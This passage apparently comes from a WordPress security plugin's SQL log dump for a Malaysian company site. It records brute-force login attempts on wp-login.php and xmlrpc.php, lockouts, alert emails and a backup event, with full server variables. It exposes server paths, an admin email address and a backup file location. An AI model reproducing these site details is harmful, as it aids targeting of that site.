6:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYnEnkXpgmG5P@iB8kzuQAAAJM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072914.5796\";s:12:\"REQUEST_TIME\";s:10:\"1569072914\";}}','notice','2019-09-21 13:35:15','2019-09-21 13:35:14',18315248,19613176,'https://bintara.com.my/test/xmlrpc.php',1,0,'137.74.158.143'),(25979,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:35:12\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:35:12\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:50:12\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:50:12\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:35:12','2019-09-21 13:35:12',17882688,19289944,'https://bintara.com.my/test/wp-login.php',1,0,'137.74.158.143'),(25978,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYnD1iJ7D9Gn7wDPh8h4wAAANc\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"137.74.158.143\";s:11:\"REMOTE_PORT\";s:5:\"34784\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYnD1iJ7D9Gn7wDPh8h4wAAANc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072911.6632\";s:12:\"REQUEST_TIME\";s:10:\"1569072911\";}}','notice','2019-09-21 13:35:12','2019-09-21 13:35:12',17797768,19289944,'https://bintara.com.my/test/wp-login.php',1,0,'137.74.158.143'),(25977,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYnAXkXpgmG5P@iB8kzrwAAAIM\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"142.93.49.140\";s:11:\"REMOTE_PORT\";s:5:\"51082\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYnAXkXpgmG5P@iB8kzrwAAAIM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072897.2988\";s:12:\"REQUEST_TIME\";s:10:\"1569072897\";}}','notice','2019-09-21 13:34:58','2019-09-21 13:34:57',18314672,19613456,'https://bintara.com.my/test/xmlrpc.php',1,0,'142.93.49.140'),(25975,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:34:55\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:34:55\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:49:55\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:49:55\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:34:56','2019-09-21 13:34:55',17880432,19286672,'https://bintara.com.my/test/wp-login.php',1,0,'142.93.49.140'),(25976,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:34:56','2019-09-21 13:34:55',18086912,19286672,'https://bintara.com.my/test/wp-login.php',1,0,'142.93.49.140'),(23656,0,'notification_center','send::backup','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:33:\"[bintara.com.my/] Database Backup\";}','debug','2019-09-04 03:26:42','2019-09-04 03:26:07',19051752,73975048,'wp-cron',1,0,'103.6.198.69'),(23657,0,'backup','email-succeeded','a:5:{s:8:\"settings\";a:9:{s:9:\"all_sites\";b:0;s:6:\"method\";i:1;s:8:\"location\";s:84:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups\";s:6:\"retain\";i:0;s:3:\"zip\";b:1;s:7:\"exclude\";a:2:{i:0;s:14:\"itsec_lockouts\";i:1;s:10:\"itsec_temp\";}s:7:\"enabled\";b:1;s:8:\"interval\";i:7;s:8:\"last_run\";i:1566962908;}s:12:\"mail_success\";b:1;s:4:\"file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20190904-112608-g5fAT1tHd4BBgFUinitnOomra8u0lm.sql\";s:11:\"output_file\";s:163:\"/home/norfaiz/public_html/bintara.com.my/wp-content/uploads/ithemes-security/backups/backup-bintara-solutions-sd-20190904-112608-g5fAT1tHd4BBgFUinitnOomra8u0lm.zip\";s:4:\"size\";i:2786399;}','notice','2019-09-04 03:26:43','2019-09-04 03:26:07',22477680,73975048,'wp-cron',1,0,'103.6.198.69'),(23655,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"94.23.12.84\";s:11:\"REMOTE_PORT\";s:5:\"44192\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7b37mh4I5iAnitdxg2sgAAAQU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567546335.5189\";s:12:\"REQUEST_TIME\";s:10:\"1567546335\";}}','notice','2019-09-03 21:32:16','2019-09-03 21:32:15',18201488,19501208,'https://bintara.com.my/xmlrpc.php',1,0,'94.23.12.84'),(23654,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"94.23.12.84\";s:11:\"REMOTE_PORT\";s:5:\"43860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7b3Lmh4I5iAnitdxg2sQAAAQM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567546332.4202\";s:12:\"REQUEST_TIME\";s:10:\"1567546332\";}}','notice','2019-09-03 21:32:14','2019-09-03 21:32:12',17852672,19178160,'https://bintara.com.my/wp-login.php',1,0,'94.23.12.84'),(23653,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"94.23.12.84\";s:11:\"REMOTE_PORT\";s:5:\"43860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7b3Lmh4I5iAnitdxg2sQAAAQM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567546332.4202\";s:12:\"REQUEST_TIME\";s:10:\"1567546332\";}}','notice','2019-09-03 21:32:13','2019-09-03 21:32:12',17691096,19178160,'https://bintara.com.my/wp-login.php',1,0,'94.23.12.84'),(23652,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.245.137\";s:11:\"REMOTE_PORT\";s:5:\"44830\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7XaLmh4I5iAnitdxg1LAAAAQo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567545192.8459\";s:12:\"REQUEST_TIME\";s:10:\"1567545192\";}}','notice','2019-09-03 21:13:14','2019-09-03 21:13:13',18202744,19502096,'https://bintara.com.my/xmlrpc.php',1,0,'138.68.245.137'),(23651,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.245.137\";s:11:\"REMOTE_PORT\";s:5:\"44534\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW7XZrmh4I5iAnitdxg1KAAAAQA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567545190.1919\";s:12:\"REQUEST_TIME\";s:10:\"1567545190\";}}','notice','2019-09-03 21:13:11','2019-09-03 21:13:10',17684152,19177088,'https://bintara.com.my/wp-login.php',1,0,'138.68.245.137'),(23650,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"M